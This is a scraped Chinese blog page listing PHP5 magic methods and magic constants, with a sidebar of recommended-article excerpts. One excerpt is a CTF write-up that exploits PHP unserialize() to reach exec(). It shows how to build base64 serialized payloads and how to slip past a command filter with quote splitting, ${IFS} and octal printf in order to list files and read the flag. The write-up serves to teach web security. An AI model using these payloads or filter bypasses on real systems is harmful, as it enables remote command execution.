PHP5中魔术方法函数有哪几个,举例说明各自的用法

最新推荐文章于 2021-03-25 18:25:44 发布
最新推荐文章于 2021-03-25 18:25:44 发布
阅读量514 收藏 2
点赞数
分类专栏: PHP
本文详细介绍了PHP中的魔术方法,包括构造、析构、调用不存在的方法和属性等,并解释了魔术常量的作用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

魔术方法:

__construct() :实例化对象时被调用;

__destuct():当删除一个对象或者对象操作终止是被执行;

__call():调用对象不存在方法时被调用;

__get():调用对象不存在的属性时被调用;

__set():设置对象不存在的属性时被调用;

__toString():打印一个对象时被调用,比如echo $obj,print($obj);

__clone():克隆对象时被调用,比如$t = new Test();$tt = clone $t;

__sleep():serialize之前被调用,若对象比较大,想做一些删除在序列化,可以考虑使用该方法;

__wakeup():unserialize之前被调用,做些对象的初始化;

__isset():检测对象是否存在属性的时候被调用,如 isset($c->name);

__unset():unset一个对象属性时被调用,如:unset($c->name);

__set_state():调用var_export时被调用,用__set_state的返回值作为 var_export的返回值;

__autoload():实例化一个对象时,如果对应的类不存在,在该方法被调用。

 

魔术常量:

__LINE__:返回当前行号;

__FILE__:返回文件的完整路径和文件名,如果用在包含文件里面,则返回包含文件名,自 php4.0.2后,__FILE__总是包含一个绝对路径,而在此前的版本有时候会包含一个相对路径;

__FUNCTION__:返回函数名称(自 php4.3.0新加的)。自php5起本常量返回该函数被定义时的名称,区分大小写,在php4中该值总是小写;

__CLASS__:返回类的名称,自 php4.3.0新加的,自php5起本常量返回该类被定义时的名称,区分大小写,在php4中该值总是小写的;

__METHOD__:返回类的方法名。 php5新加的

后端开发中PHP的高效编码技巧
架构师的AI之路,分享AI应用开发架构的学习与实践。
05-10 655
本文旨在为PHP后端开发者提供一套全面的高效编码技巧,帮助开发者提升代码质量、开发效率和系统性能。内容涵盖从基础语法优化到高级架构设计,从单机应用到分布式系统开发的全方位PHP编码技巧。文章首先介绍PHP高效编码的基本概念,然后深入探讨性能优化、设计模式、框架使用等核心技巧,最后通过实际案例展示这些技巧的综合应用。每个部分都配有详细的代码示例和性能对比数据。OPcache:PHP内置的字节码缓存机制,可显著提高脚本执行速度Composer:PHP的依赖管理工具,现代PHP开发的标配PSR。
php面试题大全及答案
精灵码农
01-21 1万+
** ## 包括PHP基础部分、数据库部分、面向对象部分、ThinkPHP部分部分、smarty模板引擎、二次开发系统(DEDE、ecshop)、微信公众平台开发、对于自身掌握的技术描述等几部分PHP面试题。 ** 1、PHP语言的一大优势是跨平台,什么是跨平台? PHP的运行环境最优搭配为Apache+MySQL+PHP,此运行环境可以在不同操作系统(例如windows、Linux等)上配置,不受操作系统的限制,所以叫跨平台 2、WEB开发中数据提交方式有几种?有什么区别?百度使用哪种方式? Get
PHP5中常用的魔术函数有哪些,举例说明各自的用法
weixin_34014555的博客
07-16 125
所谓魔术函数,是指不同时刻为了完成特定的功能,而自动调用的方法。 __sleep 在serialize()序列化对象之前会调用这个函数__wakeup 在unserialize()解序列化之前调用这个函数__toString 当将对象转化为字串的时候调用这个函数__construct 构造函数,实例化一个对象的时候调用__destruct 析构函数,当对象实力被释放的...
php5魔术方法函数哪几个,php中的类魔术方法有哪些
weixin_29103603的博客
03-19 202
php中的类魔术方法有:1、__sleep,返回一个包含对象中所有应被序列化的变量名称的数组;2、__tostring,返回一个类被当作字符串时要输出的内容;3、__construct,构造方法;4、__destruct,析构方法。在PHP中将所有以双下划线(__)开头的类方法保留为魔术方法。(推荐教程:php图文教程)下面我们来看看都有哪些魔术方法:1、__sleep:返回一个包含对象中所有应被...
php 魔术方法总结
ding_117的博客
04-15 360
1、__get、__set 这两个方法是为在类和他们的父类中没有声明的属性而设计的 __get( $property ) 当调用一个未定义的属性时访问此方法 __set( $property, $value ) 给一个未定义的属性赋值时调用 这里的没有声明包括当使用对象调用时,访问控制为proteced,private的属性(即没有权限访问的属性) 2、__isset、__unset
PHP5魔术方法函数哪几个,请举例说明各自的用法
diyao5994的博客
05-24 175
__sleep serialize 之前被调用 __wakeup unserialize 时被调用 __toString 打印一个对象时被调用 __set_state 调用 var_export 时被调用,用 __set_state 的返回值作为 var_export 的返回值 __construct 构造函数,实例化对象时被调用 __destruct 析构函数,当对象销...
PHP5中常见魔术方法函数
yg-w的博客
10-30 399
PHP5中常见魔术方法函数 魔术方法:           __construct():  实例化对象时被调用;           __destuct():    当删除一个对象或者对象操作终止时被执行;           __call():      调用对象不存在方法时被调用;           __get():       调用对象不存在的属性时被调用;        
php中的函数isset()
03-08
我得举几个典型例子,比如检查普通变量、数组键、多个变量。同时,要注意常见的错误用法,比如检查字符串偏移量或对象属性是否存在,isset()可能不适用,这时候应该用其他方法。 关于官方文档,我需要确保引用的...
攻防世界 unseping(小白能看懂)讲解了一些绕过方法saltwy于 2024-12-10 14:45:33 发布阅读量897 收藏 9点赞数 30文章标签: 安全 网络版权题目代码:<?phphighlight_file(__FILE__); class ease{ private $method; private $args; function __construct($method, $args) { $this->method = $method; $this->args = $args; } function __destruct(){ if (in_array($this->method, array("ping"))) { call_user_func_array(array($this, $this->method), $this->args); } } function ping($ip){ exec($ip, $result); var_dump($result); } function waf($str){ if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) { return $str; } else { echo "don't hack"; } } function __wakeup(){ foreach($this->args as $k => $v) { $this->args[$k] = $this->waf($v); } } } $ctf=@$_POST['ctf'];@unserialize(base64_decode($ctf));?>先一点一点的分析看到最后一段代码:$ctf=@$_POST['ctf'];@unserialize(base64_decode($ctf));意思是从HTTP POST请求中获取名为ctf的数据,并赋值给变量$ctf,@用于隐藏可能的错误base64_decode()函数用于将$ctf中的base64编码字符串解码成原始数据,unserialize将进过序列化的字符串还原为php的原始数据结构,比如数组或对象。根据解释大概知道了我们传入的ctf需要先进行base64加密,在经过序列化后传入。进过了上一步骤后看到这段代码__wakeup(): function __wakeup(){ foreach($this->args as $k => $v) { $this->args[$k] = $this->waf($v); } } __wakeup()函数的触发条件是,当使用unserialize()函数反序列化对象时,会自动触发,这里提一下绕过__wakeup()的方法,当序列化字符串表示对象属性个数的值大于真实个数的属性值时会跳过__wakeup的执行。继续,当触发__wakeup函数后会执行foreach()函数的执行,这里补充一下foreach函数,foreach是php中用于遍历数组或对象的结构。它会迭代数组中的每个键值对,执行循环体中的代码。语法foreach($array as $key =>$value){},这里$array:要遍历的数组,$key:当前元素的键(下标)。$value:当前元素的值。,我们举个例子:$array = ['a' => 1, 'b' => 2, 'c' => 3];foreach ($array as $key => $value) { echo "Key: $key, Value: $value\n";}// 输出:// Key: a, Value: 1// Key: b, Value: 2// Key: c, Value: 3接下来讲一下$this->args[$k] = $this->waf($v)这段的作用:$this->args[$k]:表示数组中的键值为$k的元素。例如,如果$k="name",那么$this->args[$k]就等于$this->$args["name"],$this->waf($v):调用了当前类中的方法waf(),并将$v作为参数传递给它。waf()方法的返回值会覆盖$this->args[$k]的原始值,这里举一个例子看如下代码:class Example { private $args; function __construct($args) { $this->args = $args; } function __wakeup() { foreach ($this->args as $k => $v) { $this->args[$k] = $this->waf($v); } } function waf($str) { return strtoupper($str); // 将字符串转换为大写 } function getArgs() { return $this->args; }} // 初始化对象$obj = new Example(['name' => 'John', 'age' => '25']);$obj->__wakeup(); // 手动调用 __wakeup() print_r($obj->getArgs());// 输出:// Array// (// [name] => JOHN// [age] => 25// )__destruct(),__construct(),print(),waf()接下来就剩下__destruct(),和__construct()还有ping(),waf()这几个,我们直接直击要害,__construct()或者魔术方法的触发就是你创建一个这个类的时候它就会自动调用,而__destruct()这个魔术方法则是这个函数销毁时自动调用接下来主要分析waf()这里使用了一个!preg_match_all()函数来检测$str是否包含某些危险字符或关键词。看到__destruct()这个魔术方法,这里讲一下in_array()这个函数,用于检查某个值是否村粗在一个数组中的函数。它返回true或false,也就是说如果这个类的$method=ping,那么就执行call_user_func_array()函数,call_user_func_array()函数的作用:用于动态地调用一个方法函数,并传递参数。这里的$this是啥,举个列子,$example = new ease();那么这个this就代表$example,而这里的$this->method则是调用的方法或者函数。也就是说我们要将method复制为ping,然后调用ping命令,然后执行exec(),将$args赋值为我们要执行的函数,还要绕过waf题目中遇见的waf,和如何绕过waf如何绕过:这里cat,tca被过滤了可以考虑使用more,less,sort,nl(显示的时候顺便显示行号),uniq,还可以使用反斜杠连接,还有可以使用'',"",${Z},进行拼接,例如cat可以用c${Z}at或者c/at,c''at,c""at,空格绕过可以使用${IFS},$IFS$9,< 符号等绕过/绕过我们可以使用oct绕过,先将/ord("/”)然后转换为八进制,将值面前的0o记得去掉,举个例子开始构造:class ease{ private $method; private $args; function __construct($method,$args){ $this->method = $method; $this->args = $args; }} $a = new ease(ping,array('l""s'));$b = serialize($a);echo base64_encode($b);之后得到的序列化将post的形式赋值给ctf得到如下,可以看到flag_1s_here,尝试去读取继续构造代码$a = new ease("ping",array('l""s${IFS}f""lag_1s_here'));接下来需要查看flag的值,因为cat被过滤了可以使用less,more等上面已经讲过,开始构造,$a = new ease("ping",array('more<f""lag_1s_here$(printf${IFS}"\57")f""lag_831b69012c67b35f.p""hp'));这里/被oct(ord("/"))转换过,而printf可以识别不同进制的数字,它支持通过格式说明符来输出十进制,十六进制,八进制等不同进制的数字而\57转换出来则是/可以成功绕过wafarray(2) { [0]=> string(5) " string(47) "//$cyberpeace{9cb5f1187f5c30d98b3f68a274d63299}" }
最新发布
04-03
- 方法调用链:触发预定义魔术方法(如 `__wakeup()`, `__destruct()` 等)从而实现恶意逻辑执行。 为了发现此类漏洞,建议采用静态代码审查方式定位潜在危险点,并追踪数据流直至确认是否存在可被操纵之处[^1]。 ...
2020最新PHP面试题(附带答案)
热门推荐
weixin_43814458的博客
03-02 2万+
1.什么事面向对象?主要特征是什么? 面向对象是程序的一种设计方式,它利于提高程序的重用性,使程序结构更加清晰。主要特征:封装、继承、多态。 我的官方群点击此处。 2.SESSION 与 COOKIE的区别是什么,请从协议,产生的原因与作用说明? 1、http无状态协议,不能区分用户是否是从同一个网站上来的,同一个用户请求不同的页面不能看做是同一个用户。 2、SESSION存储...
PHP中的11个魔术方法
fk668的博客
02-26 274
1、__get、__set 这两个方法是为在类和他们的父类中没有声明的属性而设计的 __get( $property ) 当调用一个未定义的属性时访问此方法 __set( $property, $value ) 给一个未定义的属性赋值时调用 这里的没有声明包括访问控制为proteced,private的属性(即没有权限访问的属性) 2、__isset、__unset __isset( $property ) 当在一个未定义的属性上调用isset()函数时调用此...
PHP5魔术方法函数哪几个
weixin_34221775的博客
08-13 104
2019独角兽企业重金招聘Python工程师标准>>> ...
PHP魔术函数原理介绍和简单使用
不忘初心 方得始终
03-12 2973
魔术函数 魔术函数PHP中内置的语言特性,当程序执行到某种情况时,如果定义了这些魔术函数 (php手册中称之为“Overloading”),则PHP会调用他们,同时也会传入相应的参数,可以认为是PHP执行过程中的钩子函数。常见的魔术函数有__construct, __destruct , __call, __get, __set, __isset, __unset __sleep, __wak
PHP有哪些魔术方法
一个人的Code博客
03-25 110
魔术方法包括: __construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(),当对不可访问属性调用unset()时被调用。 __sleep(),执行serialize()时,先会调用
php5个常用魔术方法
qq_40592933的博客
08-30 394
<?php class Person { public $name; public $age; /** * moshu constructor. * @param $name * @param $age * 执行时机:在使用 new关键字使用类实例化一个对象时自动执行 * 功能作用:通常用于对对象的属性进行初始...
php魔术方法16种,PHP之十六个魔术方法详解 (一)
weixin_31111015的博客
03-12 241
原标题:PHP之十六个魔术方法详解 (一)前言PHP中把以两个下划线__开头的方法称为魔术方法(Magic methods),这些方法PHP中充当了举足轻重的作用。 魔术方法包括:__construct(),类的构造函数__destruct(),类的析构函数__call(),在对象中调用一个不可访问方法时调用__callStatic(),用静态方式中调用一个不可访问方法时调用__get(),获得...
关于php中的一些常见的魔术方法
u012368971的专栏
12-07 477
在接触到php中的面向对象的部分的时候,接触了一大堆的魔术方法,接下来我们对其一一介绍他们的使用场景,使用方法,参数和返回值。  首先介绍__construct与__destruct:class Test{ public $name='xiaoMing'; protected $age = 18; private $money = 300; public function __const
PHP之十六个魔术方法详细介绍
CaiL_520914的博客
08-24 378
PHP中把以两个下划线__开头的方法称为魔术方法(Magic methods),这些方法PHP中充当了举足轻重的作用。 魔术方法包括: __construct(),类的构造函数__destruct(),类的析构函数__call(),在对象中调用一个不可访问方法时调用__callStatic(),用静态方式中调用一个不可访问方法时调用__get(),获得一个类的成员变量时调用__set(
13个PHP魔术函数
小小天下飞的博客
09-06 7062
__construct() 实例化对象时被调用, 当__construct和以类名为函数名的函数同时存在时,__construct将被调用,另一个不被调用。 __destruct() 当删除一个对象或对象操作终止时被调用。 __call() 对象调用某个方法, 若方法存在,则直接调用;若不存在,则会去调用__call函数。 __get() 读取...
PHP魔术方法详解:构造与析构函数及常用实例
本文将深入探讨PHP中的几种常见魔术方法,包括构造函数(__construct)、析构函数(__destruct)以及其他一些关键魔术方法,如__get(), __set(), 和__call()等。 1. **构造函数和析构函数** - 构造函数(__construct): ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值